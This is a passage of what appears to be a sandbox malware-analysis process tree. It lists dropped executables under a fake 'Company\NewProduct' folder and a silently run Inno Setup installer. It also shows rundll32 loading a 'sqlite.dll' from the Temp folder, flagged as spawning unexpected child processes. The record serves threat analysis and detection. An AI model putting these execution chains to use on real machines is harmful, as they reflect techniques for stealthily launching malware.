C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵PID:5184
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵PID:4464
-
-
-
C:\Users\Admin\Documents\aJff0hDL9B3WXmr_DSumlwW4.exe"C:\Users\Admin\Documents\aJff0hDL9B3WXmr_DSumlwW4.exe"2⤵
- Executes dropped EXE
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\is-LFB5V.tmp\aJff0hDL9B3WXmr_DSumlwW4.tmp"C:\Users\Admin\AppData\Local\Temp\is-LFB5V.tmp\aJff0hDL9B3WXmr_DSumlwW4.tmp" /SL5="$2023C,138429,56832,C:\Users\Admin\Documents\aJff0hDL9B3WXmr_DSumlwW4.exe"3⤵PID:4492
-
C:\Users\Admin\AppData\Local\Temp\is-LPLF3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LPLF3.tmp\Setup.exe" /Verysilent4⤵PID:8148
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4080 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2304
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17220 -s 241⤵PID:17560